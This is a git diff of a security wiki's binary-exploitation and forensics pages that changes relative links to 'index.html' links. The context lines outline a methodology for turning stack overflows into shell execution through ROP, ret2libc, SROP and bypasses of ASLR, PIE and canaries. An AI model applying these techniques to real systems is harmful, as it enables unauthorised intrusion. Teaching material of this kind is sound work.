diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md index 22b89214a..28eb4d66b 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -44,7 +44,7 @@ You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** ## libc GOT entries -The **GOT of libc** is usually compiled with **partial RELRO**, making it a nice target for this supposing it's possible to figure out its address ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)). +The **GOT of libc** is usually compiled with **partial RELRO**, making it a nice target for this supposing it's possible to figure out its address ([**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)). Common functions of the libc are going to call **other internal functions** whose GOT could be overwritten in order to get code execution. diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md index 62aa4f6a3..022f8b74d 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md @@ -24,10 +24,10 @@ With so many techniques it's good to have a scheme when each technique will be u There are different was you could end controlling the flow of a program: -- [**Stack Overflows**](../stack-overflow/) overwriting the return pointer from the stack or the EBP -> ESP -> EIP. +- [**Stack Overflows**](../stack-overflow/index.html) overwriting the return pointer from the stack or the EBP -> ESP -> EIP. - Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow - Or via **Arbitrary Writes + Write What Where to Execution** - - [**Format strings**](../format-strings/)**:** Abuse `printf` to write arbitrary content in arbitrary addresses. + - [**Format strings**](../format-strings/index.html)**:** Abuse `printf` to write arbitrary content in arbitrary addresses. - [**Array Indexing**](../array-indexing.md): Abuse a poorly designed indexing to be able to control some arrays and get an arbitrary write. - Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow - **bof to WWW via ROP**: Abuse a buffer overflow to construct a ROP and be able to get a WWW. @@ -52,16 +52,16 @@ Something to take into account is that usually **just one exploitation of a vuln ### Goal: Call an Existing function - [**ret2win**](#ret2win): There is a function in the code you need to call (maybe with some specific params) in order to get the flag. - - In a **regular bof without** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) you just need to write the address in the return address stored in the stack. - - In a bof with [**PIE**](../common-binary-protections-and-bypasses/pie/), you will need to bypass it - - In a bof with [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), you will need to bypass it + - In a **regular bof without** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **and** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html) you just need to write the address in the return address stored in the stack. + - In a bof with [**PIE**](../common-binary-protections-and-bypasses/pie/index.html), you will need to bypass it + - In a bof with [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html), you will need to bypass it - If you need to set several parameter to correctly call the **ret2win** function you can use: - A [**ROP**](#rop-and-ret2...-techniques) **chain if there are enough gadgets** to prepare all the params - - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (in case you can call this syscall) to control a lot of registers + - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html) (in case you can call this syscall) to control a lot of registers - Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers - - Via a [**Write What Where**](../arbitrary-write-2-exec/) you could abuse other vulns (not bof) to call the **`win`** function. + - Via a [**Write What Where**](../arbitrary-write-2-exec/index.html) you could abuse other vulns (not bof) to call the **`win`** function. - [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address. - - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses. + - [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) or [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) might affect the addresses. - [**Uninitialized vatiables**](../stack-overflow/uninitialized-variables.md): You never know. ### Goal: RCE @@ -69,30 +69,30 @@ Something to take into account is that usually **just one exploitation of a vuln #### Via shellcode, if nx disabled or mixing shellcode with ROP: - [**(Stack) Shellcode**](#stack-shellcode): This is useful to store a shellcode in the stack before of after overwriting the return pointer and then **jump to it** to execute it: - - **In any case, if there is a** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** in a regular bof you will need to bypass (leak) it - - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) it's possible to jump to the address of the stack as it won't never change - - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) you will need techniques such as [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) to jump to it - - **With** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), you will need to use some [**ROP**](../rop-return-oriented-programing/) **to call `memprotect`** and make some page `rwx`, in order to then **store the shellcode in there** (calling read for example) and then jump there. + - **In any case, if there is a** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html)**,** in a regular bof you will need to bypass (leak) it + - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) it's possible to jump to the address of the stack as it won't never change + - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) you will need techniques such as [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) to jump to it + - **With** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), you will need to use some [**ROP**](../rop-return-oriented-programing/index.html) **to call `memprotect`** and make some page `rwx`, in order to then **store the shellcode in there** (calling read for example) and then jump there. - This will mix shellcode with a ROP chain. #### Via syscalls -- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**. - - If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries. - - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) can be useful to prepare the **ret2execve** +- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/index.html): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**. + - If [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) or [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries. + - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html) can be useful to prepare the **ret2execve** - Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers #### Via libc -- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Useful to call a function from a library (usually from **`libc`**) like **`system`** with some prepared arguments (e.g. `'/bin/sh'`). You need the binary to **load the library** with the function you would like to call (libc usually). - - If **statically compiled and no** [**PIE**](../common-binary-protections-and-bypasses/pie/), the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. - - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. - - With [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out). - - With [ASLR](../common-binary-protections-and-bypasses/aslr/) but no [PIE](../common-binary-protections-and-bypasses/pie/), knowing the libc and **without the binary using the `system`** : +- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/index.html): Useful to call a function from a library (usually from **`libc`**) like **`system`** with some prepared arguments (e.g. `'/bin/sh'`). You need the binary to **load the library** with the function you would like to call (libc usually). + - If **statically compiled and no** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html), the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. + - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. + - With [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out). + - With [ASLR](../common-binary-protections-and-bypasses/aslr/index.html) but no [PIE](../common-binary-protections-and-bypasses/pie/index.html), knowing the libc and **without the binary using the `system`** : - Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it - - **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) and calculate the address of `system` and `'/bin/sh'` in memory. - - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and not knowing the libc**: You need to: - - Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/) + - **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) and calculate the address of `system` and `'/bin/sh'` in memory. + - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **and not knowing the libc**: You need to: + - Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) - Find the **`libc` version** used (leak a couple of function addresses) - Check the **previous scenarios with ASLR** to continue. @@ -105,7 +105,7 @@ Something to take into account is that usually **just one exploitation of a vuln #### Misc - [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address. - - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses. + - [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) or [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) might affect the addresses. - [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md index e5649b195..e80b94ed4 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md @@ -8,9 +8,9 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter ## Bypasses -- It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/) **to bypass** this protection by executing chunks of executable code already present in the binary. - - [**Ret2libc**](../rop-return-oriented-programing/ret2lib/) - - [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/) +- It's possible to use techniques such as [**ROP**](../rop-return-oriented-programing/index.html) **to bypass** this protection by executing chunks of executable code already present in the binary. + - [**Ret2libc**](../rop-return-oriented-programing/ret2lib/index.html) + - [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/index.html) - **Ret2...** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md index 418b91c60..c9e320b49 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md @@ -23,7 +23,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary bypassing-canary-and-pie.md {{#endref}} -- Use an **arbitrary read** vulnerability such as [**format string**](../../format-strings/) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). +- Use an **arbitrary read** vulnerability such as [**format string**](../../format-strings/index.html) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass). ## References diff --git a/src/binary-exploitation/libc-heap/heap-overflow.md b/src/binary-exploitation/libc-heap/heap-overflow.md index 47ad2cc36..96b32c9c4 100644 --- a/src/binary-exploitation/libc-heap/heap-overflow.md +++ b/src/binary-exploitation/libc-heap/heap-overflow.md @@ -4,7 +4,7 @@ ## Basic Information -A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.** +A heap overflow is like a [**stack overflow**](../stack-overflow/index.html) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.** In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this. diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md index 0645e6ced..23e170e92 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/README.md @@ -37,7 +37,7 @@ First, let's assume we've identified the necessary gadgets within the binary or Using **pwntools**, we prepare the stack for the ROP chain execution as follows aiming to execute `system('/bin/sh')`, note how the chain starts with: 1. A `ret` instruction for alignment purposes (optional) -2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/)) +2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/index.html)) 3. Placeholder for the return address from `system()` 4. `"/bin/sh"` string address (parameter for system function) @@ -158,8 +158,8 @@ Check the following page for this information: ## Protections Against ROP -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution. -- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/): In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution. +- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html): In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain - **Lack of Gadgets**: If there aren't enough gadgets it won't be possible to generate a ROP chain. ## ROP based techniques diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md index 42160ff90..d588683c0 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -179,7 +179,7 @@ target.interactive() ### Why Not Just Use libc Directly? -Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**. +Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/index.html), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index b4cb7c75e..7a533a75b 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md @@ -13,7 +13,7 @@ Therefore, it's possible to **fake all these structures** to make the dynamic li Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`. > [!TIP] -> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming/)) and there are't ways to leak libc addresses. +> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/index.html) or [SROP](srop-sigreturn-oriented-programming/index.html)) and there are't ways to leak libc addresses. Chek this video for a nice explanation about this technique in the second half of the video: diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md index 12aa1bd45..6cf77159b 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md @@ -6,7 +6,7 @@ **Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored. -If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)). +If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)). Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack. @@ -179,7 +179,7 @@ p.interactive() ## Protections - [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it. -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) & [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): Those can make harder to find a instruction to jump to esp or any other register. ## References diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md index fb13cbc13..6bdc7083c 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md @@ -16,7 +16,7 @@ In order to prepare the call for the **syscall** it's needed the following confi So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area. > [!TIP] -> Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/). +> Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/index.html). ## Register gadgets diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 4dc022c78..047a9d7be 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md @@ -134,11 +134,11 @@ target.interactive() - [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared) - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop) - [https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html) - - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure and read the flag which is inside the memory of the binary. + - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/index.html) via a **sigreturn** structure and read the flag which is inside the memory of the binary. - [https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html) - - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure (the binary has the string `/bin/sh`). + - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/index.html) via a **sigreturn** structure (the binary has the string `/bin/sh`). - [https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html) - - 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](../rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell. + - 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](../rop-syscall-execv/index.html). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell. - [https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html) - 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it. - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection) diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index 5aeba41af..8cd5fb11d 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md @@ -63,7 +63,7 @@ However, in other scenarios maybe just **overwriting some variables values in th ### Ret2win -In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called: +In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called: {{#ref}} ret2win/ diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md index 5076edd89..4f77191a1 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/README.md +++ b/src/binary-exploitation/stack-overflow/ret2win/README.md @@ -77,8 +77,8 @@ The Python script sends a carefully crafted message that, when processed by the ## Protections -- [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address. -- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed. +- [**PIE**](../../common-binary-protections-and-bypasses/pie/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address. +- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed. ## Other examples & References diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index 2f11ab017..7933e9b4e 100644 --- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -32,7 +32,7 @@ Then, you need to know the address used by `ret` that will **execute arbitrary c - A valid [**ONE_GADGET**](https://github.com/david942j/one_gadget) address. - The address of **`system()`** followed by **4 junk bytes** and the address of `"/bin/sh"` (x86 bits). - The address of a **`jump esp;`** gadget ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) followed by the **shellcode** to execute. -- Some [**ROP**](../rop-return-oriented-programing/) chain +- Some [**ROP**](../rop-return-oriented-programing/index.html) chain Remember than before any of these addresses in the controlled part of the memory, there must be **`4` bytes** because of the **`pop`** part of the `leave` instruction. It would be possible to abuse these 4B to set a **second fake EBP** and continue controlling the execution. @@ -56,7 +56,7 @@ Now, the **`ESP`** is controlled pointing to a desired address and the next inst Basically this way it's possible to chain several fake EBPs to control the flow of the program. -This is like a [ret2lib](../rop-return-oriented-programing/ret2lib/), but more complex with no apparent benefit but could be interesting in some edge-cases. +This is like a [ret2lib](../rop-return-oriented-programing/ret2lib/index.html), but more complex with no apparent benefit but could be interesting in some edge-cases. Moreover, here you have an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a winning function. This is the final payload from the page: diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md index f89fe4e9f..227a96d8d 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md @@ -78,8 +78,8 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w ## Protections -- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. -- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed. +- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. +- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed. - [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable. ## Other Examples & References diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index af2609f07..652df42af 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -52,7 +52,7 @@ This tool can scan an image and will **extract pcaps** inside it, **network info bulk_extractor memory.img -o out_folder ``` -Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**). +Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/index.html)), search for **weird domains** (domains related to **malware** or **non-existent**). ### PhotoRec diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index 34a0728d9..5ac2eb0da 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -48,7 